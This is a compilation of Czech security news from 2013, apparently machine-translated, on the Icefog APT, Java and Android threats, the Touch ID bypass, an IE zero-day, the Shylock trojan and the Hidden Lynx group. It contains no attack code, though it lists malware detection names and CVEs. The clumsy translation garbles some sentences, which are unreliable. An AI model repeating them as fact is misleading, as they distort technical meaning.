Ano, jsou více aktivní Icefog C a C-s v současné době, se živými oběťmi připojení k nim. Také jsme byli schopni závrtu několika oblastech využívaných Icefog a shromažďovat statistické údaje o obětech. Celkově jsme zaznamenali více než 3600 unikátních IP adres a infikovaných několik set obětí. Plné Sinkhole statistiky jsou k dispozici v našem Icefog papíru.

Co přesně je ukraden z cílových počítačích?
Útočníci kradou několik typů informací, včetně:

Citlivé dokumenty a firemní plány.
E-mail pověření účtu.
Hesla pro přístup různých zdrojů uvnitř i vně oběť k síti.
Je to národ-stát podporovaný útok?
Neexistuje žádný konkrétní důkaz, aby potvrdil to byl národ-stát podporovaný provoz. Jediným způsobem, jak rozlišit protivníka skupin tím, že určí jejich význam v rámci kampaně.

Apts mohou zaměřit jakékoliv organizace či podnik s cennými daty, ať už je to národní stát sponzorovaný cyber-espionage/surveillance provoz, nebo finančně motivované cyber-kriminální operace. Na základě analýzy a topologii obětí by útočníci se převodu ukradených dat do peněz nebo jej používáte cyber-účely špionáže.

"Hit a run" povaha této operace je jedna z věcí, které dělají to neobvyklé. Zatímco v jiných případech, oběti zůstává infikovaný měsíce nebo dokonce roky, a data jsou neustále exfiltrated se Icefog útočníci jeví velmi dobře vědí, co je třeba z obětí. Jakmile je informace je získána, se opouští oběť.

Během posledních let jsme zaznamenali velký nárůst počtu apts které zasáhly skoro všechny typy obětí a odvětví. Na druhé straně, je to spojeno se zvýšeným důrazem na citlivé informace a firemní počítačové špionáže.

V budoucnu předpokládáme počet malých, zaměřených APT-to-najmout skupin rostou, specializující se na hit-and-run operací.

Kdo je za to zodpovědný?
Uveďte informace o Icefog je k dispozici prostřednictvím naší soukromé zprávě dostupné pro partnery vlády a vymáhání práva.

Kromě Japonska a Jižní Koreje, jsou tam oběti v jakékoli jiné zeměpisné poloze?
Ano, jsme pozorovali mnoho obětí v několika dalších zemích, včetně Tchaj-wanu, Hongkongu, Číně, USA, Austrálii, Kanadě, Velké Británii, Itálii, Německu, Rakousku, Singapuru, Běloruska a Malajsie. Domníváme se však, že tento seznam zemí nemusí představovat skutečný zájem z útočníků. Některé vzorky byly distribuovány prostřednictvím veřejně přístupných internetových stránkách a mohou zasáhnout náhodné oběti z jakékoliv země na světě. Věříme, že to bylo děláno, aby sonda malware v různých prostředích a vyzkoušet jeho účinnost.

Na jak dlouho, že útočníci byli aktivní?
Icefog působí nejméně od roku 2011, se zaměřením hlavně Jižní Koreje a Japonska. Známé cílům patří vládní instituce, vojenští dodavatelé, námořní / lodní stavitelství skupiny, telekomunikační operátoři, průmyslové a vysoce technologických firem a médií.

Věděli útočníci použít některé zajímavé / pokročilých technologií?
Příkaz-a-ovládací prvky jsou neobvyklé v jejich rozsáhlé využití technologií AJAX, což je graficky lákavé a snadné použití. K útoku obětí, Icefog útočníci běžně používá NsP dokumenty, které jsou neobvyklé a vzácná forma útoku, částečně proto, že se výrobek HWP používá téměř výhradně v Koreji.

Jednou jedna z obětí, jsme pozorovali, co se zdá být použití Kernel exploit prostřednictvím Java aplikace pro eskalaci oprávnění, i když nevím, jestli to byl zero-day, nebo ne, jak byl soubor není k dispozici .

Má Kaspersky Lab detekovat všechny varianty tohoto malware?
Ano, naše produkty detekovat a odstranit všechny varianty malwaru použité v této kampani:

Backdoor.ASP.Ace.ah
Backdoor.Win32.Agent.dcjj
Backdoor.Win32.Agent.dcwq
Backdoor.Win32.Agent.dcww
Backdoor.Win32.CMDer.ct
Backdoor.Win32.Visel.ars
Backdoor.Win32.Visel.arx
Exploit.MSWord.CVE-2010-3333.cg
Exploit.MSWord.CVE-2010-3333.ci
Exploit.MSWord.CVE-2012-0158.ae
Exploit.MSWord.CVE-2012-0158.az
Exploit.MSWord.CVE-2012-0158.bu
Exploit.MSWord.CVE-2012-0158.u
Exploit.Win32.CVE-2012-0158.j
Exploit.Win32.CVE-2012-0158.u
Exploit.WinHLP.Agent.d
Trojan-Downloader.Win32.Agent.ebie
Trojan-Downloader.Win32.Agent.gxmp
Trojan-Downloader.Win32.Agent.gzda
Trojan-Downloader.Win32.Agent.gznn
Trojan-Downloader.Win32.Agent.tenl
Trojan-Downloader.Win32.Agent.vigx
Trojan-Downloader.Win32.Agent.vkcs
Trojan-Downloader.Win32.Agent.wcpy
Trojan-Downloader.Win32.Agent.wqbl
Trojan-Downloader.Win32.Agent.wqdv
Trojan-Downloader.Win32.Agent.wqqz
Trojan-Downloader.Win32.Agent.xrlh
Trojan-Downloader.Win32.Agent.xsub
Trojan-Downloader.Win32.Agent.xyqw
Trojan-Downloader.Win32.Agent.yavh
Trojan-Downloader.Win32.Agent.yium
Trojan-Dropper.Win32.Agent.gvfr
Trojan-PSW.Win32.MailStealer.j
Trojan-Spy.Win32.Agent.bwdf
Trojan-Spy.Win32.Agent.bxeo
Trojan.PHP.Agent.ax
Trojan.Win32.Genome.ydxx
Trojan.Win32.Icefog.*

Existují Ukazatele kompromis (IOCs), jak pomáhat obětem identifikovat vniknutí?


Icefog APT: Příběh plášť a tři dýky
26.9.2013 Zdroj: Kaspersky Hacking | Počítačový útok

Vznik malých skupin kybernetické žoldáků k dispozici k pronájmu provádět chirurgické operace hit a běh.
Svět pokročilých perzistentních hrozeb (apts) je dobře známá. Kvalifikovaní protivníci kompromisů vysoce postavených oběti a nepozorovaně exfiltrating cenná data v průběhu mnoha let. Tyto týmy někdy počítat desítky nebo dokonce stovky lidí, prochází TB nebo dokonce petabajty exfiltrated dat.

Ačkoli tam byl rostoucí zájem o přičítání a přesné zdroje těchto útoků, ne hodně je známý o nově vznikající trend: menší hit-and-run gangy, které se chystáte po dodavatelském řetězci a ohrožení cílů s chirurgickou přesností.

Od roku 2011 jsme sledovali sérii útoků, které jsme odkaz ohrožení herce s názvem "Icefog". Věříme, že je relativně malá skupina útočníky, kteří se jdou po v dodavatelském řetězci - zaměřit vládní instituce, vojenští dodavatelé, námořní a stavba lodí skupiny, telekomunikační operátoři, satelitní operátoři, průmyslové a špičkové technologie a sdělovací prostředky, zejména v Jižní Korea a Japonsko. To Icefog kampaně spoléhají na zakázku Cyber-špionáže nástrojů pro Microsoft Windows a Apple Mac OS X. útočníků přímo ovládat infikované stroje během útoků, kromě Icefog, všimli jsme si je pomocí jiné škodlivé nástrojů a zadní vrátka pro boční pohyb a Údaje exfiltrace.

Klíčové poznatky o Icefog útoky:

Útočníci se spoléhají na kopí-phishing a využívá k známých zranitelností (např. CVE-2012 až 0158, CVE-2012-1856 CVE-2013 až 0422 a CVE-2012-1723). Návnada dokumenty použité při útocích jsou specifické pro cílový zájem, například útok na mediální společnost v Japonsku používá následující návnadu:

Lure dokument zobrazený na oběti po úspěšném provedení exploitu

Na základě profilů známých cílů, útočníci Zdá se, že zájem těchto oblastech: vojenské, stavby lodí a námořní operace, výzkumné společnosti, telekomunikační operátory, satelitní operátoři, média a televize .
Výzkum ukazuje, že útočníci měli zájem o cílení dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost , lodní společnosti jako DSME Tech, Hanjin Heavy Industries nebo telekomunikační operátoři, jako je Korea Telecom .
Útočníci jsou únosy citlivých dokumentů a plánuje společnost, e-mailových účtů pověření a hesel pro přístup k různým zdrojů uvnitř i vně oběti síti.
Během operace, útočníci se pomocí "Icefog" backdoor sadu (také známý jako "Fucobha"). Kaspersky Lab identifikovány verze Icefog jak pro Microsoft Windows a Mac OS X .
Zatímco ve většině ostatních APT kampaní, oběti zůstává infikovaný po celé měsíce nebo dokonce roky a útočníků jsou průběžně exfiltrating dat Icefog operátoři zpracování oběti rychle a chirurgické způsobem - vyhledávání a kopírování pouze konkrétní a cílené informace. Jakmile je požadovaná informace je získána, ale opustit infekce a jít dál.
Ve většině případů se Icefog operátoři zřejmě již velmi dobře vědí, co je třeba z obětí. Vypadají konkrétní názvy souborů , které jsou označeny a převedeny do C & C.
Kaspersky Lab by rád poděkoval KISA (Korea Internet & Security Agency) a Interpolem za jejich podporu v tomto šetření.

Detailní dotazy na Icefog je k dispozici.

Můžete si přečíst celý náš Icefog zprávu zde:

[Klikněte pro stažení]


Java využije skok, Android malware se objeví mimo app obchodech
25.09.2013 Viry | Zranitelnosti | Hacking
Pokračující vzestup využívání útoků na, a to zejména proti Javě, a rostoucí sofistikovanost v mobilních hrozeb charakterizoval první polovině roku 2013, který viděl jeho podíl na zajímavých vývoj ve světě digitální bezpečnosti. Podle nové F-Secure je Threat Report , téměř 60% z top F-Secure deset zjištěných v prvním pololetí roku 2013 byly hrdinské činy. vysoké procento zjištěných činů je dobrá věc, podle Sean Sullivan, bezpečnostní poradce ve společnosti F-Secure Labs. "Skutečnost, že většina našich deset nejlepších detekcí blokují využije spíše než s užitečným zatížením - to znamená, že děláme dobrou práci, ujistěte se, že malware sám o sobě nemá ani šanci vstoupit do stroje," říká . Uživatelé v USA viděl největší chybu související útoky s 78 z každých 1000 uživatelů potýká exploit pokus. Německo a Belgie následovala 60 ze 1000 potýká exploit pokusy. Java cílené využije vést smečku využije jako celku, což tvoří téměř polovinu z deseti největších odhalení, a to až z třetiny předchozí pololetí. Využije jsou programy, ale jsou to prostě jen další prostředek pro získání škodlivého kódu do stroje, jako infikované jednotky USB nebo e-mailem. Obvykle útočí přes škodlivé nebo narušení webových stránek, které využívají chyb v kódu na počítači je nainstalované aplikace pro přístup do počítače a infikovat ji s malware, který může špehovat na uživatele, ukrást hesla nebo jiná citlivá data, nebo povolit zločinci převzít kontrolu ze stroje. bylo 358 nových rodin a varianty malwaru Android objeven Labs F-Secure v 1. pololetí téměř zdvojnásobil celkový počet Labs kdy objevil na 793. (Počet vzorků Android nacházejí v 1. pololetí bylo 405.140, včetně spyware a adware, malware vzorky samostatně číslovány 257443). Symbian následoval s 16 nových rodin a variant. Žádné nové rodiny nebo varianty byly objeveny další mobilní platformy. Android malware není jen distribuována app obchodech už, a to buď. V první polovině roku 2013 došlo rozvoz malvertising a automatickým stahováním z webu při návštěvě ohrožena stránky. Malvertising nebo reklamy, které vedou uživatele na nebezpečné výrobky, se stále více používá k distribuci mobilního malware, náležitý z části k jeho širokému dosahu. Zatímco ještě méně sofistikované na mobil, než na PC, jsou drive-by download bude pokračovat jako útoku. Mobile Drive-bys použít potvrzující zprávu s dotazem, zda chce uživatel nainstalovat aplikaci, což je více než zřejmé, PC drive-odstavných ploch, s možností obcházet. Stels, trojské Android, které slouží více účelům, od budování botnety krást Čísla mobilních transakcí Authentication (mTANs) jako bankovní trojan, používá metody, které jsou obvykle charakteristické pro Windows malware, jako je spam jako metody distribuce. To slouží jako důkaz, že Android malware se postupující blíže k dosažení vysoce rozvinutou úroveň hrozby Windows.


Apple dotykový ID hack bylo snazší, než se očekávalo
25.září 2013 Zabezpečení | Hacking
Bylo potvrzeno : Kosmik z německého klubu Chaos Computer získal dav-source cenu pro dotykové hacking Apple ID . funkce bezpečnostního Jak vysvětlil Ars Technica , hack bylo snazší, než čekal - místo týden nebo dva doufal by se ho na to, že mu trvalo 30 hodin, a on říká, že s lepší přípravou by trvalo přibližně půl hodiny. "Ty v podstatě to udělat doma s levnou kancelářských zařízení jako skener, laserovou tiskárnou a Sada pro leptání plošných spojů. A to bude trvat jen na pár hodin, "sdílel. "Tyto techniky jsou vlastně několik let a jsou snadno dostupné na internetu." Přesto se domnívá, dotykové ID, že je velmi spolehlivý otisků prstů, ale říká, že Apple by nabízel své pohodlí, a to tvrdil, že je v bezpečí. Lookout Security výzkumník Marc Rogers se snažil kopírovat Kosmiku hack, a podařilo se mu to s některými změnami, aby bylo jednodušší. "Ano, TouchID obsahuje chyby, a ano, je to možné využívat ty chyby a odemknout iPhone. ale skutečnost je taková, Tyto nedostatky nejsou něco, že průměrný spotřebitel by měl bát. Proč? Protože jejich využívání bylo něco ale triviální. Hacking TouchID spoléhá na kombinaci dovedností, stávající akademický výzkum a trpělivost technik Crime Scene, "napsal a sdílet jeho vlastní pohled na hack. "TouchID není" silné "bezpečnostní kontrolou. Jedná se o" výhodné "bezpečnostní kontrolou," říká a ukazuje na to, že to bude chránit vaše data před zloději ulice, která chytne svůj telefon, nebo v případě, ztratíte telefon, ale ne z cíleného útoku. "vyhrazená útočníkovi času a zdrojů pozorovat svou oběť a shromažďování dat, se pravděpodobně nebude vidět TouchID jako velkou výzvu. Naštěstí to není hrozba, že mnoho z nás čelí, "dodal. Ale když se dostal nejvíce pozornosti, Touch ID není jedinou bezpečnostní funkci, aby byly předvedeny Apple při uvolňování nových iPhone a iOS7 - podívejte se na reakce z bezpečnostní komunity na iOS 7 na dozvědět více o nich.


Útočníci brousit dovednosti: Co to vlastně znamená pro CISO
24. září 2013. Zabezpečení | Hacking
Dnes, IBM odhaluje výsledky svého X-Force 2013 Mid-Year Trend a zprávy o rizicích, která ukazuje, že vrchní úředníci bezpečnosti informací (CISO) musí zvýšit své znalosti o vyvíjející se zranitelnost a útoku krajiny, jako jsou mobilní a sociální technologie, účinněji bojovat proti vznikající bezpečnostní hrozby. Pro ​​CISO, je to žádným překvapením, že se snažil a pravdivé taktiky útok může způsobit největší škody podniku. Známé chyby opustil unpatched ve webových aplikacích a serverů a koncových bodů software, vytvářet příležitosti k útokům dochází. Tyto unpatched aplikací a softwaru nadále pomocníky porušuje rok co rok. Nicméně nejnovější X-Force Zpráva rovněž uznává, že útočníci se zlepšit jejich dovednosti, které jim umožní zvýšit návratnost jejich vykořisťování. Tyto útočníci se vydělávat na důvěře uživatelů, pokud jde o nové vektorů, jako jsou sociální média, mobilní technologie a napajedla útoky. Nárůst využívání důvěryhodných vztahů v polovině roku 2013, útočníci nadále zaměřovat na využívání důvěryhodné vztahy se sociálními sítěmi z profesionálně vypadající spamu, posílání škodlivé odkazy, které se zdají být od přátel nebo lidí, které "budou následovat." Tyto útoky dělat práci, poskytuje vstupní bod do organizace. Na jejich obranu, sociální sítě přijaly více proaktivní opatření v pre-skenování odkazy obsažené ve veřejných a soukromých příspěvků / messages. Podvodníci se prodávají účty na sociálních sítích, některé patří ke skutečným lidem, jejichž pověřovací listiny byly ohroženy, jiní vyrobeny a navrženy tak, aby se důvěryhodné prostřednictvím realistických profily a webové připojení. Jako minimum fungují nafouknout stránce "líbí se mi" nebo vyvrátit názory, ačkoli více zákeřné použití patří skrývání vlastní identity provádět trestné činnosti - online ekvivalent falešné ID, ale s svědeckých přáteli, přidávat k podvodu. IBM X-Force očekává, že aplikace sociálního inženýrství propracovanější jako útočníci vytvářet složité Internetworks identit při rafinaci umění klamání obětí. Technologie vylepšení a ovládací prvky jsou k dispozici, osvědčené postupy i nadále rafinované a učil, ale nakonec důvěra uživatel věří, že se mohou obejít cokoliv bezpečnostní odborníci zavést. Otrava napajedlo otravy WaterholeAttackers se zaměřením na centrální, strategické cíle, jako je zvláštního zájmu Webové stránky, které jsou často navštěvují vybranou skupinu potenciálních cílů je efektivní a optimalizovaný způsob využití. Tyto ústřední cíle nemusejí mít vždy silné bezpečnostní řešení a nasadit politiky, a to iv případě, že ano, náklady na přijít na to, jak se dostat přes ně stojí možnost ohrozit jeho uživatelská základna. Tyto "zavlažování díra" útoky jsou skvělé příklad toho, jak funkční sofistikovanost se používá k dosažení cíle dříve citlivý. Tím by byla ohrožena centrální místo a používat to, aby sloužit malware, útočníci jsou schopni dosáhnout více technicky zdatné oběti, které nemohou být oklamáni v pokusy o phishing, ale nebude tušit, že stránky, které by mohly být škodlivé důvěra. rozptýlení a přesměrování techniky Distributed Denial-- of-Service ( DDoS ) útoky lze použít jako rozptýlení, což umožňuje útočníkům prolomit další systémy v podniku, zatímco IT pracovníci jsou nuceni činit obtížná rozhodnutí založené na rizicích, případně bez viditelnosti v plném rozsahu toho, co se děje. Útočníci prokázaly zvýšenou technickou náročnost v oblasti DDoS využitím metod zvyšování množství schopného šířku pásma, aktualizované a účinný způsob, jak zastavit podnikání přerušení on-line služby, stejně jako nové techniky DDoS zmírnění úniků. Vzhledem k tomu, rozsahu a četnosti narušení dat pokračuje ve vzestupné trajektorii, je důležitější než kdy jindy se dostat zpět do základní bezpečnostní základy. Zatímco technická zmírnění je nutnost, vzdělávání uživatelů v celém podniku, že bezpečnost je způsob myšlení, není výjimkou, může jít dlouhou cestu směrem k snížení těchto incidentů. Kompletní zpráva je k dispozici zde .


IE 0-day attack zprávy tlačit ISC zvýšit oficiální úrovně ohrožení
24. září 2013.Zranitelnosti | Hacking
Během víkendu, FireEye vědci podařilo vrhnout světlo na in-the-Wild útoků Využitím nejnovější objevil Internet Explorer zero-day zranitelnosti (CVE-2013-3893), a byly sledovány zpět do čínské hackerské skupiny, které postihly . Bit9 letos Podle jejich výzkumu, kampaň - daboval DeputyDog - byl cílení japonské organizace od August 19 srpnu 2013, a útočníci byli pomocí C & C infrastrukturu, která se vztahuje k infrastruktury používané v útoku na Bit9 :

Některé vzorků malwaru, které objevili a analyzovány byly sestaveny 19. srpna. Jako připomínka: Microsoft vydala opravit chyby zabezpečení dne 17. září, a potvrdila, že se týká všech podporovaných verzí aplikace Internet Explorer. Mají stále není potvrzena, kdy bude tato aktualizace zabezpečení, kterým se stanoví vadu být propuštěn. Další je Patch Tuesday je naplánováno na říjen 8, takže zbývá doufat, že Microsoft se bude zabývat vydávání out-of-band patch. Mezitím Internet Sans "Storm Center reagoval tím, že zvýší své oficiální úrovně ohrožení na "žlutý", po "větší důkaz o zneužití ve volné přírodě o Microsoft Security Advisory 2887505". "Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle," komentoval ISC psovod Russ McRee a dodal, že Rapid 7 je také pravděpodobné, že uvolnění Metasploit exploitu pro chybu brzy. "Nejjednodušší způsob, jak se vyhnout tomuto riziku je použít jiný prohlížeč než Internet Explorer," upozornil Ross Barrett, senior manažer bezpečnostní inženýrství na Rapid7. "Uživatelé, kteří musí používat Internet Explorer by měla nainstalovat všechny dostupné záplaty Internet Explorer, a používat pouze nejnovější dostupné verze. Ani jedna z těch věcí, bude přímo pomoci s tímto konkrétním problému, ale jsou dobré postupy a předpoklady pro následujících akcí, které mají být v veškeré účinné. " "Chcete-li snížit riziko zneužití tohoto problému, nainstalujte Emet 4.0, nakonfigurujte ji nutit ASLR a umožňují řadu haldy postřiku a ROP ochran. Navíc, tam je" fixit "k dispozici od společnosti Microsoft, který se bude snažit změnit systém, aby se zabránilo zneužívání, "řekl uzavřena .


Prolomeno. První hackeři dokázali překonat snímač otisků nového iPhonu

23.9.2013 Hacking | Zranitelnosti | Biometrika | Mobil

Stačil týden a bezpečnostní prvek snímače otisků padl. Skupina německých hackerů tvrdí, že se jí podařilo zabezpečení prolomit jen dva dny poté, co Apple začal modely distribuovat na pulty obchodů. Právě snímač otisků má přitom chránit přístroje před zločinci a slídily.

Snímač otisku prstu zabudovaný v tlačítku je jedním z hlavních lákadel nového iPhonu 5s
Bezpečnostní prvek telefonu se údajně podařilo prolomit německé skupině známé jako Chaos Computing Club, tedy CCC. Skupina to uvedla na svých stránkách. Zástupci Applu se ke zprávě nevyjádřili.

CCC zveřejnil video, které ukazuje, jak se jim podařilo dostat do iPhonu 5S pomocí falešného otisku prstu. Skupina získala otisk tak, že vyfotografovala a vytiskla na tenkou folii. Ke svému článku přidala navíc návod, jak otisk prstu získat.

„Otisk prstu by se neměl používat pro zabezpečení čehokoliv. Necháváte ho všude a je velmi jednoduché si vyrobit falešný otisk prstu,“ uvedl v článku hacker, který si říká Starbug. Podle CCC podobný postup lze použít k prolomení většiny snímačů otisků prstů na trhu.

Dotykový senzor iPhonu má telefon odlišit od konkurence

Dotykový senzor na novém modelu iPhonu 5S slouží k odemknutí přístroje a nakupování v internetovém obchodě iTunes. Uživateli stačí jednoduše přiložit svůj prst na hlavní tlačítko telefonu. Recenzenti se minulý týden rozplývali nad jeho spolehlivostí a nad tím, jak se snadno používá.

Bezpečnostní odborníci, kteří minulý týden nabídli odměnu tomu, kdo jako první prolomí zabezpečení snímače prstů iPhonu, uvedli, že zkoumají informace zveřejněné na internetových stránkách CCC, ale chtějí více informací. Odměna za prolomení kódu činí více než 13 tisíc dolarů (zhruba 247 tisíc korun) v hotovosti.

Bezpečnostní rizika skrývá také iOS 7

Forbes.com ale mezitím informoval, že jistý voják na Kanárských ostrovech už odhalil slabé prvky v zabezpečení zasahujícím operační systém iOS 7, který Apple stávajícím uživatelům iPhonů a tabletů iPad zpřístupnil ve středu. Podle něj je během několika vteřin možné obejít uzamčení obrazovky a dostat se k fotografiím a dalším materiálům. Mluvčí Applu Trudy Mullerová řekla, že firma v příští aktualizaci systému provede opravy.


Firmy proti dnešním útokům využívají staré strategie

23.09.2013 Zabezpečení | Hacking
Společnosti zaostávají, protože útočníci je zatím stále přechytračují díky nejnovějším technologiím, kterými jsou vybaveni.

Firmy proti dnešním útokům využívají staré strategie

Válka o informace pokračuje a boje přituhují. Zatímco ale organizace pomalu nasazují obranné techniky, které byly vyvinuty před lety proti tehdejším technologiím, protivníci využívají slabin, které mohly být objeveny třeba tento týden. Platí to v České republice stejně jako v jakékoli jiné zemi.

Poměrně alarmující informace v pátek uveřejnila konzultační společnost PricewaterhouseCoopers. Ve studii „The global state of information security survery 2014“, která vychází z dat nasbíraných od více než 9 600 společností a bezpečnostních profesionálů, primárně vybíraných v oblasti asijského Pacifiku.

Letošní analýza zjistila, že počet bezpečnostních incidentů, které byly detekovány během posledních 12 měsíců, se meziročně zvýšily o 25 procent, zatímco průměrný finanční dopad takového útoku se zvednul o 18 procent. Přitom investice do bezpečnosti jsou i nadále velké, průměrný rozpočet určený na bezpečnost se za poslední rok zvýšil o 85 procent. Většina respondentů je i nadále optimistická, co se alokace finančních prostředků na bezpečnost týče, 60 procent počítá s dalším navýšením během následujících 12 měsíců.

Bohužel, průměrné finanční ztráty způsobené vinou bezpečnostních incidentů se zvedly o 28 procent. Znepokojující je, že prudce vzrostl počet případů, ve kterých finanční ztráty přesáhly 10 milionů dolarů – více než o 50 procent od roku 2011.

V reakcích překvapivě figurovala značná část ředitelů jako hlavní překážka ve zlepšování bezpečnostních praktik společností. Většina respondentů uváděla jako primární zdroj bezpečnostních incidentů dřívější nebo současné zaměstnance, u bezpečnostních útoků zvnějšku 32 procent společností jmenuje jako původce hackerské skupiny a pouze 4 procent uvádí jako útočníky státní agentury.

PricewaterhouseCoopers doporučuje přepracování bezpečnostních strategií tak, aby byly integrovány s potřebami každé společnosti a aby jim priority přidělovalo vrcholné vedení. „80 procent respondentů tvrdí, že jejich informační bezpečnost je v souladu s obchodními prioritami firmy. To ukazuje, že management začíná chápat míru dopadu bezpečnostních incidentů. Ale musí jít ještě o krok dále a posílit chápání nutnosti bezpečnostních kroků ve všech částech jejich společností. Spolupráce, ať už interní či interní, je stává klíčovou zbraní.“

Jako každoročně se zpráva věnuje i mobilní a cloudové bezpečnosti, která opět zaostává proti ostatním segmentům. Například ze 4 procent respondentů, kteří využívají cloudové prostředky, má pouze 18 procent odpovídající směrnice pro jejich bezpečné a správné využívání.


Počítačoví zločinci se snaží nové taktiky , bezpečnost tělo varuje - a útoky by mohly mít " velký dopad "

22 září 2013 Kriminalita | Hacking

Počítačoví zločinci se spínací taktiku , přední bezpečnostní orgán varoval - a kombinace anonymizace technologií, mobilních zařízení a sociálních médií útoky by mohly vést k kybernetickými útoky s " velkým dopadem " .

Průběžná hrozeb zprávy vydané Evropskou bezpečnost sítí a informací agentury je " první chuť " z kompletní zprávy splatné do konce roku , a analyzuje 50 zpráv identifikovat nové a rostoucí hrozby.

Drive- by využije byly identifikovány jako číslo jedna nebezpečí ohrožující firem a uživatelů počítačů, ale společnost varovala, že další hrozby rostly v popularitě - jako škodlivé rozšíření prohlížeče . " Za zmínku stojí, ženárůst škodlivých rozšíření prohlížeče byla zaregistrována , jehož cílem je převzetí účtech sociálních sítí , " řekl ENISA . ESET zpráva o škodlivý rozšíření do populární Orbit Downloader naleznete zde .

"Je to posun od Botnety škodlivý URL jako přednostní prostředek k distribuci malwaru . Výhodou URL coby distribučního mechanismu spočívá v tom, že adresy URL nejsou tak snadným terčem pro takedowns činnými v trestním řízení , " píše se ve zprávě .

Zpráva rovněž poukázal na to , že zločinci jsou stále více ohrožuje infrastrukturu s cílenými útoky azvýšení využívání mobilních zařízení a sociální média krádeží identity prováděno prostřednictvím cloudových služeb .

" Je jasné, že mobilní technologie jsou stále více využívány kybernetických zločinců . Hrozby všeho druhu , které se vyskytují ve více tradičním aréně to bude mít vliv mobilních zařízení a služeb dostupných na těchto platformách. Široké rozšíření mobilních zařízení vede k zesílení zneužití založené na znalostech / Útok metod zaměřených na sociální média , " píše se ve zprávě .

Dostupnost cryptocurrencies a digitálních měn také zločinci se snadnou prostředky " perou " své zisky , uvádí zpráva - a také poukázal na rostoucí hrozbu kybernetických zločinců , které nabízejí "služby" vedle malware.

"Dostupnost škodlivého softwaru a cyber- hackerských nástrojů a služeb, spolu s digitálními měnách ( např. Bitcoiny ) a anonymních platebních služeb, otevírá nové možnosti pro kybernetickou podvodům a trestné činnosti . "

Tento týden ruští útočníci údajně nabídl kombinaci " hacknutý " PIN zařízení a služby, praní špinavých peněz jako " balíček" k zákazníkům.

ESET výzkumný pracovník David Harley řekl: "Nejvíce znepokojující aspekt je podpora služeb balíček . Bohužel , vypracování takových podpůrných sítí je něco , pro které východoevropské gangy ukázaly zvláštní vkus v uplynulých letech. Domnívám se, že uvidíme podobné balíčky spojené s bankovními trojských koní, které mají funkce pro přístup k informacím z čtečky čipových karet připojených k systému Windows strojů. "

ENISA varuje, že rostoucí využívání útoků , které kombinují různé techniky - mobilní , anonymních útoky a " počítačové služby ", jako praní špinavých peněz , by mohlo vést k vážným hrozbám .

"Existujereálná možnost velkých dopadů událostí , kdy jsou útoky kombinující různé hrozby úspěšně uvedla na trh , " píše se ve zprávě .

Výkonný ředitel agentury ENISA , profesor Udo Helmbrecht řekl: " Tento krátký , průběžná zpráva informuje bezpečnostní zúčastněné strany co nejdříve o vývoji v internetovým hrozbám , aby byli schopni přijmout protiopatření " .

 

Postu Počítačoví zločinci se snaží nové taktiky , bezpečnost tělo varuje - a útoky by mohly mít " velký dopad " se objevil na prvním místě Žijeme zabezpečení.


Nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank 

22 září 2013 Viry | Hacking

Kradmý bankovnictví Trojan známý jako Caphaw nebo Shylock se vynořuje - a útočí na zákazníky z 24 amerických bank . Je vyzbrojen obranných a stealth schopností , včetně pravomocí " obnovit " se během vypnutí .

Malware je popisován jako " jeden z mála , který může ukrást peníze , kdyžuživatel přistupující jeho bankovní konta , " ESET Team Security Intelligence olovo , Aleksandr Matrosov , kdo vydal podrobnou analýzu malware v letošním roce.

" Je to zajímavý finanční malware rodina : jeden z mála, který má funkce autoload pro automatické krást peníze , když uživatel aktivně přístupu jeho bankovní účet. Infikovaný uživatel nemůže rozpoznat , že jeho peníze jsou ukradené, " píše Matrosov .

" Tato hrozba má mnoho technik pro vynechání bezpečnostní software a vyhnout automatizované zpracování vzorků malwaru . "

Zscaler uvedl na svém blogu : " Za poslední měsíc se ThreatLabZ vědci aktivně sleduje nedávné uptick v počtu Win32/Caphaw ( od nynějška známá jako Caphaw ) infekce , které se aktivně zaměřují na bankovní účty uživatelů od roku 2011 . Můžete rozpoznat tuto hrozbu z výzkumu hotový WeLiveSecurity letos v souvislosti s touto hrozbou cílení EU bankovní weby . Tentokrát se zdá být v ničem neliší . Zatím jsme svázané tuto hrozbu monitorovat Je to oběť za přihlašovací údaje do 24 finančních institucí. "

Bezpečnostní firma Zscaler oznámily nárůst detekcí malware tento týden, zaměření 24 amerických bank včetně Chase Manhattan , Bank of America , Citi a Wells Fargo . Poprvé zjištěn v roce 2011 ,malware cílený evropských zákazníků ve Velké Británii , Itálii, Dánsku a Turecku.

Zscaler Výzkumníci říkají, že malware byl pravděpodobně šíří pomocí exploit kitu přes zranitelných verzí Javy.

V tuto chvíli ESET Virus Radar ukazuje nárůst infekcí v Severní Americe. Zscaler varuje, že kradmé povaha malwaru znamená, že je obtížné zjistit - více informací na stealth schopnosti tohoto malwaru lze nalézt v analýze Matrosov je.

" Caphaw můžete ovládat restart / vypnutí procesu a umožňujemalware obnovit sám po některé antivirové čistící postupy byly provedeny , " řekl Matrosov ve své funkci .

Příspěvek nelze udržet špatný muž se : " Shylock " Trojan se vrací k útoku amerických bank se objevila na prvním místě Žijeme zabezpečení.


Skryté Lynx - Profesionální hackeři k pronájmu

21.září 2013 Hacking | Kriminalita

Za posledních několik let, zprávy se objevují stále popisovat činnosti aktérů stojí za různých cílených útoků nebo pokročilých perzistentních hrozeb (Apts). Zde na Symantec Security Response, jsme se udržet oči na skupinu, které věříme, že patří mezi to nejlepší z plemene. Dali jsme jim jméno Skrytá Lynx-po řetězu, který byl nalezen ve sděleních velení a řízení serveru. Tato skupina má hlad a úsilí, které převyšují ostatní známých skupin, jako jsou APT1/Comment Crew. Hlavní charakteristiky této skupiny jsou:

technická zdatnost
hbitost
organizovaný
naprostá vynalézavost
trpělivost
Tyto atributy jsou znázorněny na houževnaté kampaní vedených proti více souběžných cílů po delší časové období. Jsou průkopníky "zavlažování díra" technice zálohy cíle, mají včasný přístup k zero-day zranitelností, a mají houževnatost a trpělivost inteligentní lovce narušena dodavatelského řetězce, aby se na skutečné cíle. Tyto útoky dodavatelském řetězci provádí infikování počítačů u dodavatele zamýšlené cíle a pak čekat na infikované počítače, které mají být nainstalovány a volání domů, jasně jsou super vypočtené akce spíše než impulsivní nájezdy amatérů.

